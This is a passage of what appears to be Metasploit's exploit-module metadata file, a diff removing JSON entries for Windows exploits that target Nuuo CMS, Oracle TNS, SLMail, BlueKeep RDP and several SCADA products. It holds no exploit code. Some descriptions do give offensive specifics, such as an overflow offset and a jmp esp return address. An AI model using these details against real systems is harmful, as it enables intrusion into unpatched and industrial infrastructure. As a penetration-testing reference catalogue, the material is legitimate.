{}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/nuuo/nuuo_cms_fu": { - "name": "Nuuo Central Management Server Authenticated Arbitrary File Upload", - "fullname": "exploit/windows/nuuo/nuuo_cms_fu", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-11", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n CMS Server.\n The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n characters. Therefore, this function can be abused to overwrite any files in the installation\n drive of CMS Server.\n\n This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n\n This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n not execute successfully.", - "references": [ - "CVE-2018-17936", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", - "URL-https://seclists.org/fulldisclosure/2019/Jan/51", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5180, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Nuuo Central Management Server <= v2.4.0" - ], - "mod_time": "2022-01-13 18:54:56 +0000", - "path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb", - "is_install_path": true, - "ref_name": "windows/nuuo/nuuo_cms_fu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/nuuo/nuuo_cms_sqli": { - "name": "Nuuo Central Management Authenticated SQL Server SQLi", - "fullname": "exploit/windows/nuuo/nuuo_cms_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-10-11", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is\n installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.", - "references": [ - "CVE-2018-18982", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", - "URL-https://seclists.org/fulldisclosure/2019/Jan/51", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5180, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Nuuo Central Management Server <= v2.10.0" - ], - "mod_time": "2022-01-13 18:54:56 +0000", - "path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb", - "is_install_path": true, - "ref_name": "windows/nuuo/nuuo_cms_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/oracle/client_system_analyzer_upload": { - "name": "Oracle Database Client System Analyzer Arbitrary File Upload", - "fullname": "exploit/windows/oracle/client_system_analyzer_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-01-18", - "type": "exploit", - "author": [ - "1c239c43f521145fa8385d64a9c32243", - "juan vazquez " - ], - "description": "This module exploits an arbitrary file upload vulnerability on the Client\n Analyzer component as included in Oracle Database 11g, which allows remote\n attackers to upload and execute arbitrary code. This module has been tested\n successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution\n through the Windows Management Instrumentation service has been used.", - "references": [ - "CVE-2010-3600", - "OSVDB-70546", - "BID-45883", - "ZDI-11-018", - "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" - ], - "platform": "Windows", - "arch": "", - "rport": 1158, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/oracle/client_system_analyzer_upload.rb", - "is_install_path": true, - "ref_name": "windows/oracle/client_system_analyzer_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/oracle/extjob": { - "name": "Oracle Job Scheduler Named Pipe Command Execution", - "fullname": "exploit/windows/oracle/extjob", - "aliases": [], - "rank": 600, - "disclosure_date": "2007-01-01", - "type": "exploit", - "author": [ - "David Litchfield", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job\n Scheduler is implemented via the component extjob.exe which listens on a named pipe\n called \"orcljsex\" and execute arbitrary commands received over this channel via\n CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.\n Note that the Job Scheduler is disabled in default installations.", - "references": [ - "URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/extjob.rb", - "is_install_path": true, - "ref_name": "windows/oracle/extjob", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/osb_ndmp_auth": { - "name": "Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow", - "fullname": "exploit/windows/oracle/osb_ndmp_auth", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-14", - "type": "exploit", - "author": [ - "MC " - ], - "description": "The module exploits a stack buffer overflow in Oracle Secure Backup.\n When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-5444", - "OSVDB-51340", - "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html" - ], - "platform": "Windows", - "arch": "", - "rport": 10000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/osb_ndmp_auth.rb", - "is_install_path": true, - "ref_name": "windows/oracle/osb_ndmp_auth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/tns_arguments": { - "name": "Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow", - "fullname": "exploit/windows/oracle/tns_arguments", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-06-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Oracle 8i. When\n sending a specially crafted packet containing an overly long\n ARGUMENTS string to the TNS service, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2001-0499", - "OSVDB-9427", - "BID-2941" - ], - "platform": "Windows", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", - "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/tns_arguments.rb", - "is_install_path": true, - "ref_name": "windows/oracle/tns_arguments", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/tns_auth_sesskey": { - "name": "Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow", - "fullname": "exploit/windows/oracle/tns_auth_sesskey", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-10-20", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long AUTH_SESSKEY value\n to the TNS service, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-1979", - "OSVDB-59110", - "BID-36747", - "URL-http://blogs.conus.info/node/28", - "URL-http://blogs.conus.info/node/35", - "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html" - ], - "platform": "Windows", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Oracle 10.2.0.1.0 Enterprise Edition", - "Oracle 10.2.0.4.0 Enterprise Edition" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/tns_auth_sesskey.rb", - "is_install_path": true, - "ref_name": "windows/oracle/tns_auth_sesskey", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/tns_service_name": { - "name": "Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow", - "fullname": "exploit/windows/oracle/tns_service_name", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-05-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long SERVICE_NAME\n to the TNS service, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2002-0965", - "OSVDB-5041", - "BID-4845", - "URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", - "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/tns_service_name.rb", - "is_install_path": true, - "ref_name": "windows/oracle/tns_service_name", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/pop3/seattlelab_pass": { - "name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow", - "fullname": "exploit/windows/pop3/seattlelab_pass", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-05-07", - "type": "exploit", - "author": [ - "stinko " - ], - "description": "There exists an unauthenticated buffer overflow vulnerability\n in the POP3 server of Seattle Lab Mail 5.5 when sending a password\n with excessive length.\n\n Successful exploitation should not crash either the\n service or the server; however, after initial use the\n port cannot be reused for successive exploitation until\n the service has been restarted. Consider using a command\n execution payload following the bind shell to restart\n the service if you need to reuse the same port.\n\n The overflow appears to occur in the debugging/error reporting\n section of the slmail.exe executable, and there are multiple\n offsets that will lead to successful exploitation. This exploit\n uses 2606, the offset that creates the smallest overall payload.\n The other offset is 4654.\n\n The return address is overwritten with a \"jmp esp\" call from the\n application library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n return address works against all version of Windows and service packs.\n\n The last modification date on the library is dated 06/02/99. Assuming\n that the code where the overflow occurs has not changed in some time,\n prior version of SLMail may also be vulnerable with this exploit. The\n author has not been able to acquire older versions of SLMail for\n testing purposes. Please let us know if you were able to get this\n exploit working against other SLMail versions.", - "references": [ - "CVE-2003-0264", - "OSVDB-11975", - "BID-7519" - ], - "platform": "Windows", - "arch": "", - "rport": 110, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT/2000/XP/2003 (SLMail 5.5)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/pop3/seattlelab_pass.rb", - "is_install_path": true, - "ref_name": "windows/pop3/seattlelab_pass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/postgres/postgres_payload": { - "name": "PostgreSQL for Microsoft Windows Payload Execution", - "fullname": "exploit/windows/postgres/postgres_payload", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-04-10", - "type": "exploit", - "author": [ - "Bernardo Damele A. G. ", - "todb " - ], - "description": "On default Microsoft Windows installations of PostgreSQL the postgres\n service account may write to the current directory (which is usually\n \"C:\\Program Files\\PostgreSQL\\\\data\" where is the\n major.minor version of PostgreSQL). UDF DLL's may be sourced from\n there as well.\n\n This module uploads a Windows DLL file via the pg_largeobject method\n of binary injection and creates a UDF (user defined function) from\n that DLL. Because the payload is run from DllMain, it does not need to\n conform to specific Postgres API versions.", - "references": [ - "URL-https://web.archive.org/web/20100803002909/http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql" - ], - "platform": "Windows", - "arch": "", - "rport": 5432, - "autofilter_ports": [ - 5432 - ], - "autofilter_services": [ - "postgres" - ], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/exploits/windows/postgres/postgres_payload.rb", - "is_install_path": true, - "ref_name": "windows/postgres/postgres_payload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "postgresql" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/proxy/bluecoat_winproxy_host": { - "name": "Blue Coat WinProxy Host Header Overflow", - "fullname": "exploit/windows/proxy/bluecoat_winproxy_host", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-01-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the Blue Coat Systems WinProxy\n service by sending a long port value for the Host header in a HTTP\n request.", - "references": [ - "CVE-2005-4085", - "OSVDB-22238", - "BID-16147", - "URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinProxy <= 6.1 R1a Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb", - "is_install_path": true, - "ref_name": "windows/proxy/bluecoat_winproxy_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/proxy/ccproxy_telnet_ping": { - "name": "CCProxy Telnet Proxy Ping Overflow", - "fullname": "exploit/windows/proxy/ccproxy_telnet_ping", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-11", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the YoungZSoft CCProxy <= v6.2 suite\n Telnet service. The stack is overwritten when sending an overly\n long address to the 'ping' command.", - "references": [ - "CVE-2004-2416", - "OSVDB-11593", - "BID-11666", - "EDB-621" - ], - "platform": "Windows", - "arch": "x86", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Pro All - English", - "Windows 2000 Pro All - Italian", - "Windows 2000 Pro All - French", - "Windows XP SP0/1 - English", - "Windows XP SP2 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb", - "is_install_path": true, - "ref_name": "windows/proxy/ccproxy_telnet_ping", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/proxy/proxypro_http_get": { - "name": "Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow", - "fullname": "exploit/windows/proxy/proxypro_http_get", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-02-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Proxy-Pro Professional\n GateKeeper 4.7. By sending a long HTTP GET to the default port\n of 3128, a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "CVE-2004-0326", - "OSVDB-4027", - "BID-9716" - ], - "platform": "Windows", - "arch": "", - "rport": 3128, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Proxy-Pro GateKeeper 4.7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/proxypro_http_get.rb", - "is_install_path": true, - "ref_name": "windows/proxy/proxypro_http_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/proxy/qbik_wingate_wwwproxy": { - "name": "Qbik WinGate WWW Proxy Server URL Processing Overflow", - "fullname": "exploit/windows/proxy/qbik_wingate_wwwproxy", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-06-07", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Qbik WinGate version\n 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the\n HTTP proxy service on port 80, a remote attacker could overflow\n a buffer and execute arbitrary code.", - "references": [ - "CVE-2006-2926", - "OSVDB-26214", - "BID-18312" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinGate 6.1.1.1077" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb", - "is_install_path": true, - "ref_name": "windows/proxy/qbik_wingate_wwwproxy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/rdp/cve_2019_0708_bluekeep_rce": { - "name": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", - "fullname": "exploit/windows/rdp/cve_2019_0708_bluekeep_rce", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-05-14", - "type": "exploit", - "author": [ - "Sean Dillon ", - "Ryan Hanson", - "OJ Reeves ", - "Brent Cook " - ], - "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.", - "references": [ - "CVE-2019-0708", - "URL-https://github.com/zerosum0x0/CVE-2019-0708", - "URL-https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html" - ], - "platform": "Windows", - "arch": "", - "rport": 3389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic targeting via fingerprinting", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb", - "is_install_path": true, - "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Bluekeep" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/rdp/rdp_doublepulsar_rce": { - "name": "RDP DOUBLEPULSAR Remote Code Execution", - "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-04-14", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "Luke Jennings", - "wvu ", - "Tom Sellers", - "Spencer McIntyre" - ], - "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for RDP.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", - "references": [ - "URL-https://github.com/countercept/doublepulsar-detection-script" - ], - "platform": "Windows", - "arch": "x64", - "rport": 3389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Execute payload (x64)", - "Neutralize implant" - ], - "mod_time": "2023-09-15 16:42:03 +0000", - "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb", - "is_install_path": true, - "ref_name": "windows/rdp/rdp_doublepulsar_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "DOUBLEPULSAR" - ], - "RelatedModules": [ - "exploit/windows/smb/smb_doublepulsar_rce" - ], - "Stability": [ - "crash-os-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sage/x3_adxsrv_auth_bypass_cmd_exec": { - "name": "Sage X3 Administration Service Authentication Bypass Command Execution", - "fullname": "exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2021-07-07", - "type": "exploit", - "author": [ - "Jonathan Peterson ", - "Aaron Herndon" - ], - "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.", - "references": [ - "CVE-2020-7387", - "CVE-2020-7388", - "URL-https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 1818, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Command", - "Windows DLL", - "Windows Executable" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/sage/x3_adxsrv_auth_bypass_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "first-attempt-fail" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/scada/abb_wserver_exec": { - "name": "ABB MicroSCADA wserver.exe Remote Code Execution", - "fullname": "exploit/windows/scada/abb_wserver_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-04-05", - "type": "exploit", - "author": [ - "Brian Gorenc", - "juan vazquez " - ], - "description": "This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The\n issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe\n component, which allows arbitrary commands. The component is disabled by default, but\n required when a project uses the SCIL function WORKSTATION_CALL.\n\n This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on\n Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2019-5620", - "OSVDB-100324", - "ZDI-13-270", - "URL-https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf" - ], - "platform": "Windows", - "arch": "x86", - "rport": 12221, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ABB MicroSCADA Pro SYS600 9.3" - ], - "mod_time": "2021-03-17 15:58:21 +0000", - "path": "/modules/exploits/windows/scada/abb_wserver_exec.rb", - "is_install_path": true, - "ref_name": "windows/scada/abb_wserver_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/advantech_webaccess_dashboard_file_upload": { - "name": "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload", - "fullname": "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-02-05", - "type": "exploit", - "author": [ - "rgod", - "Zhou Yu <504137480@qq.com>", - "sinn3r " - ], - "description": "This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.\n\n This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\n of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\n The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within\n the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to\n upload arbitrary code (instead of an image) to the server, which will then be executed under the\n high-privilege context of the IIS AppPool.", - "references": [ - "CVE-2016-0854", - "ZDI-16-128", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Advantech WebAccess 8.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/scada/advantech_webaccess_dashboard_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/scada/advantech_webaccess_webvrpcs_bof": { - "name": "Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow", - "fullname": "exploit/windows/scada/advantech_webaccess_webvrpcs_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2017-11-02", - "type": "exploit", - "author": [ - "mr_me " - ], - "description": "This module exploits a stack buffer overflow in Advantech WebAccess 8.2.\n By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.", - "references": [ - "ZDI-17-938", - "CVE-2017-14016", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" - ], - "platform": "Windows", - "arch": "", - "rport": 4592, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/advantech_webaccess_webvrpcs_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/citect_scada_odbc": { - "name": "CitectSCADA/CitectFacilities ODBC Buffer Overflow", - "fullname": "exploit/windows/scada/citect_scada_odbc", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-06-11", - "type": "exploit", - "author": [ - "KF ", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n This has only been tested against Citect v5, v6 and v7.", - "references": [ - "CVE-2008-2639", - "BID-29634", - "OSVDB-46105", - "URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability", - "URL-http://www.auscert.org.au/render.html?it=9433", - "URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 20222, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Citect32.exe v5.21 NT4", - "Citect32.exe v5.21 2K/XP", - "Citect32.exe v5.41-r0 NT4", - "Citect32.exe v5.41-r0 2K/XP", - "Citect32.exe v6.0-r0 2K/XP", - "CiExceptionMailer.dll v5.42 on XP Sp2 or SP3", - "CiExceptionMailer.dll v6.0-r0 on Server 2003 Sp2", - "CiExceptionMailer.dll v6.0-r0 on XP Sp2 or SP3", - "CiExceptionMailer.dll v6.10 on XP Sp2 or SP3", - "CiExceptionMailer.dll v7.0-r0 on XP Sp2 or SP3", - "CiExceptionMailer.dll v7.0-r0 on 2003 Server SP1", - "CiExceptionMailer.dll v5.50-r0 XP SP2", - "CiExceptionMailer.dll v5.50-r0 2003 Server", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/citect_scada_odbc.rb", - "is_install_path": true, - "ref_name": "windows/scada/citect_scada_odbc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/codesys_gateway_server_traversal": { - "name": "SCADA 3S CoDeSys Gateway Server Directory Traversal", - "fullname": "exploit/windows/scada/codesys_gateway_server_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-02-02", - "type": "exploit", - "author": [ - "Enrique Sanchez " - ], - "description": "This module exploits a directory traversal vulnerability that allows arbitrary\n file creation, which can be used to execute a mof file in order to gain remote\n execution within the SCADA system.", - "references": [ - "CVE-2012-4705", - "OSVDB-90368", - "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 1211, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal S3 CoDeSyS < 2.3.9.27" - ], - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb", - "is_install_path": true, - "ref_name": "windows/scada/codesys_gateway_server_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/scada/codesys_web_server": { - "name": "SCADA 3S 